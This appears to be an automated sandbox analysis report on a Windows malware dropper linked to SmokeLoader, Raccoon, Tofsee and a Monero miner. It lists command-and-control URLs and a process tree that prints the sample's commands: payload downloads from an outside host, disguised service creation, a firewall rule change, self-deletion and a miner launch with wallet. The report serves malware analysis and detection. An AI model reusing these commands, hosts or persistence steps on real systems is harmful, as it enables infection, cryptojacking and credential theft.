Analysis
-
max time kernel
140s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09/01/2022, 17:59
Static task
static1
General
-
Target
01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe
-
Size
290KB
-
MD5
e362b54caaa2428c4f501c7afd0f0d6e
-
SHA1
176fadb2e819985b9ba100e6f70b651c0c11e448
-
SHA256
01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1
-
SHA512
b3e3bb4b2e3026e8b3af457172e7477837b925dc7105e17c92e0ca91e76d8ee2fad9b16f83faea2b2638dbb374513e5228a28a4982a8d31ab603529ecaa665f6
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
tofsee
patmushta.info
parubey.info
Extracted
raccoon
1.8.4-hotfixs
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 3008 created 984 3008 WerFault.exe 100 -
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Arkei Stealer Payload 6 IoCs
resource yara_rule behavioral1/memory/2136-140-0x0000000002E00000-0x0000000002E1C000-memory.dmp family_arkei behavioral1/memory/2136-141-0x0000000000400000-0x0000000002B86000-memory.dmp family_arkei behavioral1/memory/5076-218-0x0000000000240000-0x00000000005FF000-memory.dmp family_arkei behavioral1/memory/5076-219-0x0000000000240000-0x00000000005FF000-memory.dmp family_arkei behavioral1/memory/5076-221-0x0000000000240000-0x00000000005FF000-memory.dmp family_arkei behavioral1/memory/5076-222-0x0000000000240000-0x00000000005FF000-memory.dmp family_arkei -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral1/memory/1500-321-0x0000000000860000-0x0000000000CBB000-memory.dmp loaderbot -
Blocklisted process makes network request 1 IoCs
flow pid Process 162 3488 WScript.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 22 IoCs
pid Process 4440 7AD.exe 580 1C20.exe 3232 1C20.exe 2136 3AE4.exe 3164 46EB.exe 3236 5014.exe 2772 qgqsenej.exe 2196 5014.exe 5076 BFF6.exe 984 D822.exe 4460 FB2C.exe 1388 1888.exe 3940 2EE0.exe 4048 extd.exe 2800 extd.exe 744 setup1.exe 3260 extd.exe 408 setup2.exe 1068 extd.exe 1500 setup3.exe 1996 extd.exe 3852 Driver.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000600000001ab3e-284.dat upx behavioral1/files/0x000600000001ab3e-285.dat upx behavioral1/files/0x000600000001ab3e-289.dat upx behavioral1/files/0x000600000001ab3e-299.dat upx behavioral1/files/0x000600000001ab3e-306.dat upx behavioral1/files/0x000600000001ab3e-325.dat upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BFF6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BFF6.exe -
Deletes itself 1 IoCs
pid Process 396 Process not Found -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup3.exe -
Loads dropped DLL 6 IoCs
pid Process 2136 3AE4.exe 2136 3AE4.exe 2136 3AE4.exe 5076 BFF6.exe 5076 BFF6.exe 5076 BFF6.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup2.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup3.exe" setup3.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BFF6.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 5076 BFF6.exe 5076 BFF6.exe 1388 1888.exe 408 setup2.exe 1500 setup3.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3440 set thread context of 4148 3440 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe 69 PID 580 set thread context of 3232 580 1C20.exe 72 PID 3236 set thread context of 2196 3236 5014.exe 85 PID 2772 set thread context of 4756 2772 qgqsenej.exe 90 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 3008 984 WerFault.exe 100 784 744 WerFault.exe 114 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7AD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1C20.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1C20.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1C20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7AD.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7AD.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3AE4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3AE4.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 BFF6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString BFF6.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 5064 timeout.exe 1940 timeout.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings cmd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 162 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4148 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe 4148 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 396 Process not Found -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 628 Process not Found -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 4148 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe 4440 7AD.exe 3232 1C20.exe 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeDebugPrivilege 3236 5014.exe Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeDebugPrivilege 2196 5014.exe Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeDebugPrivilege 4460 FB2C.exe Token: SeRestorePrivilege 3008 WerFault.exe Token: SeBackupPrivilege 3008 WerFault.exe Token: SeDebugPrivilege 3008 WerFault.exe Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3440 wrote to memory of 4148 3440 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe 69 PID 3440 wrote to memory of 4148 3440 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe 69 PID 3440 wrote to memory of 4148 3440 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe 69 PID 3440 wrote to memory of 4148 3440 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe 69 PID 3440 wrote to memory of 4148 3440 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe 69 PID 3440 wrote to memory of 4148 3440 01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe 69 PID 396 wrote to memory of 4440 396 Process not Found 70 PID 396 wrote to memory of 4440 396 Process not Found 70 PID 396 wrote to memory of 4440 396 Process not Found 70 PID 396 wrote to memory of 580 396 Process not Found 71 PID 396 wrote to memory of 580 396 Process not Found 71 PID 396 wrote to memory of 580 396 Process not Found 71 PID 580 wrote to memory of 3232 580 1C20.exe 72 PID 580 wrote to memory of 3232 580 1C20.exe 72 PID 580 wrote to memory of 3232 580 1C20.exe 72 PID 580 wrote to memory of 3232 580 1C20.exe 72 PID 580 wrote to memory of 3232 580 1C20.exe 72 PID 580 wrote to memory of 3232 580 1C20.exe 72 PID 396 wrote to memory of 2136 396 Process not Found 73 PID 396 wrote to memory of 2136 396 Process not Found 73 PID 396 wrote to memory of 2136 396 Process not Found 73 PID 396 wrote to memory of 3164 396 Process not Found 74 PID 396 wrote to memory of 3164 396 Process not Found 74 PID 396 wrote to memory of 3164 396 Process not Found 74 PID 396 wrote to memory of 3236 396 Process not Found 75 PID 396 wrote to memory of 3236 396 Process not Found 75 PID 396 wrote to memory of 3236 396 Process not Found 75 PID 3164 wrote to memory of 1000 3164 46EB.exe 76 PID 3164 wrote to memory of 1000 3164 46EB.exe 76 PID 3164 wrote to memory of 1000 3164 46EB.exe 76 PID 3164 wrote to memory of 1096 3164 46EB.exe 78 PID 3164 wrote to memory of 1096 3164 46EB.exe 78 PID 3164 wrote to memory of 1096 3164 46EB.exe 78 PID 3164 wrote to memory of 1500 3164 46EB.exe 80 PID 3164 wrote to memory of 1500 3164 46EB.exe 80 PID 3164 wrote to memory of 1500 3164 46EB.exe 80 PID 3164 wrote to memory of 1708 3164 46EB.exe 82 PID 3164 wrote to memory of 1708 3164 46EB.exe 82 PID 3164 wrote to memory of 1708 3164 46EB.exe 82 PID 3164 wrote to memory of 2072 3164 46EB.exe 84 PID 3164 wrote to memory of 2072 3164 46EB.exe 84 PID 3164 wrote to memory of 2072 3164 46EB.exe 84 PID 3236 wrote to memory of 2196 3236 5014.exe 85 PID 3236 wrote to memory of 2196 3236 5014.exe 85 PID 3236 wrote to memory of 2196 3236 5014.exe 85 PID 3164 wrote to memory of 2496 3164 46EB.exe 87 PID 3164 wrote to memory of 2496 3164 46EB.exe 87 PID 3164 wrote to memory of 2496 3164 46EB.exe 87 PID 3236 wrote to memory of 2196 3236 5014.exe 85 PID 3236 wrote to memory of 2196 3236 5014.exe 85 PID 3236 wrote to memory of 2196 3236 5014.exe 85 PID 3236 wrote to memory of 2196 3236 5014.exe 85 PID 3236 wrote to memory of 2196 3236 5014.exe 85 PID 2772 wrote to memory of 4756 2772 qgqsenej.exe 90 PID 2772 wrote to memory of 4756 2772 qgqsenej.exe 90 PID 2772 wrote to memory of 4756 2772 qgqsenej.exe 90 PID 2772 wrote to memory of 4756 2772 qgqsenej.exe 90 PID 2772 wrote to memory of 4756 2772 qgqsenej.exe 90 PID 396 wrote to memory of 4876 396 Process not Found 92 PID 396 wrote to memory of 4876 396 Process not Found 92 PID 396 wrote to memory of 4876 396 Process not Found 92 PID 396 wrote to memory of 4876 396 Process not Found 92 PID 396 wrote to memory of 4572 396 Process not Found 93 PID 396 wrote to memory of 4572 396 Process not Found 93 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe"C:\Users\Admin\AppData\Local\Temp\01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Users\Admin\AppData\Local\Temp\01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe"C:\Users\Admin\AppData\Local\Temp\01ac588f435db47fe3f80a7b65ff35de0d17cee37728775e32b4255f1d58b3a1.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4148
-
-
C:\Users\Admin\AppData\Local\Temp\7AD.exeC:\Users\Admin\AppData\Local\Temp\7AD.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4440
-
C:\Users\Admin\AppData\Local\Temp\1C20.exeC:\Users\Admin\AppData\Local\Temp\1C20.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Users\Admin\AppData\Local\Temp\1C20.exeC:\Users\Admin\AppData\Local\Temp\1C20.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3232
-
-
C:\Users\Admin\AppData\Local\Temp\3AE4.exeC:\Users\Admin\AppData\Local\Temp\3AE4.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2136 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3AE4.exe" & exit2⤵PID:5072
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:5064
-
-
-
C:\Users\Admin\AppData\Local\Temp\46EB.exeC:\Users\Admin\AppData\Local\Temp\46EB.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\zbttirqx\2⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qgqsenej.exe" C:\Windows\SysWOW64\zbttirqx\2⤵PID:1096
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create zbttirqx binPath= "C:\Windows\SysWOW64\zbttirqx\qgqsenej.exe /d\"C:\Users\Admin\AppData\Local\Temp\46EB.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:1500
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description zbttirqx "wifi internet conection"2⤵PID:1708
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start zbttirqx2⤵PID:2072
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:2496
-
-
C:\Users\Admin\AppData\Local\Temp\5014.exeC:\Users\Admin\AppData\Local\Temp\5014.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\5014.exeC:\Users\Admin\AppData\Local\Temp\5014.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\SysWOW64\zbttirqx\qgqsenej.exeC:\Windows\SysWOW64\zbttirqx\qgqsenej.exe /d"C:\Users\Admin\AppData\Local\Temp\46EB.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:4756
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:4876
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4572
-
C:\Users\Admin\AppData\Local\Temp\BFF6.exeC:\Users\Admin\AppData\Local\Temp\BFF6.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:5076 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\BFF6.exe" & exit2⤵PID:1684
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:1940
-
-
-
C:\Users\Admin\AppData\Local\Temp\D822.exeC:\Users\Admin\AppData\Local\Temp\D822.exe1⤵
- Executes dropped EXE
PID:984 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 9082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Users\Admin\AppData\Local\Temp\FB2C.exeC:\Users\Admin\AppData\Local\Temp\FB2C.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
C:\Users\Admin\AppData\Local\Temp\1888.exeC:\Users\Admin\AppData\Local\Temp\1888.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1388
-
C:\Users\Admin\AppData\Local\Temp\2EE0.exeC:\Users\Admin\AppData\Local\Temp\2EE0.exe1⤵
- Executes dropped EXE
PID:3940 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2F73.tmp\2F74.tmp\2F85.bat C:\Users\Admin\AppData\Local\Temp\2EE0.exe"2⤵
- Modifies registry class
PID:3440 -
C:\Users\Admin\AppData\Local\Temp\2F73.tmp\2F74.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2F73.tmp\2F74.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:4048
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16060\123.vbs"3⤵
- Blocklisted process makes network request
PID:3488
-
-
C:\Users\Admin\AppData\Local\Temp\2F73.tmp\2F74.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2F73.tmp\2F74.tmp\extd.exe "/download" "http://a0617224.xsph.ru/1.exe" "setup1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:2800
-
-
C:\Users\Admin\AppData\Local\Temp\16060\setup1.exesetup1.exe3⤵
- Executes dropped EXE
PID:744 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 4164⤵
- Program crash
PID:784
-
-
-
C:\Users\Admin\AppData\Local\Temp\2F73.tmp\2F74.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2F73.tmp\2F74.tmp\extd.exe "/download" "http://a0617224.xsph.ru/2.exe" "setup2.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3260
-
-
C:\Users\Admin\AppData\Local\Temp\16060\setup2.exesetup2.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:408
-
-
C:\Users\Admin\AppData\Local\Temp\2F73.tmp\2F74.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2F73.tmp\2F74.tmp\extd.exe "/download" "http://a0617224.xsph.ru/3.exe" "setup3.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1068
-
-
C:\Users\Admin\AppData\Local\Temp\16060\setup3.exesetup3.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1500 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:3852
-
-
-
C:\Users\Admin\AppData\Local\Temp\2F73.tmp\2F74.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2F73.tmp\2F74.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1996
-
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
Disabling Security Tools
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1